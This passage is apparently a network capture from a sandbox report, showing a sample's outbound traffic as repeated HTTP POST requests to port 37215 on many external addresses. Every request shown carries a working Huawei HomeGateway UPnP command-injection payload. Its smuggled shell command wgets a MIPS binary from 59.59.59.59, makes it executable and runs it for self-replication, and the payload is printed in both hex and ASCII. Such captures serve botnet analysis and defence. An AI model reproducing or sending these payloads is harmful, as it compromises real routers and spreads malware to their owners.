                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          115192.168.2.154619241.232.135.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541234016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          116192.168.2.154981451.169.132.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541254044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          117192.168.2.1539914197.247.43.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541368961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          118192.168.2.1552806197.177.82.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541388035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          119192.168.2.154874872.72.92.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541394949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          120192.168.2.154694441.103.61.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541438103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          121192.168.2.1553392157.157.15.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541538000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          122192.168.2.153354441.54.67.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541605949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          123192.168.2.154584841.174.82.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541611910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          124192.168.2.1554896197.146.73.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541611910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
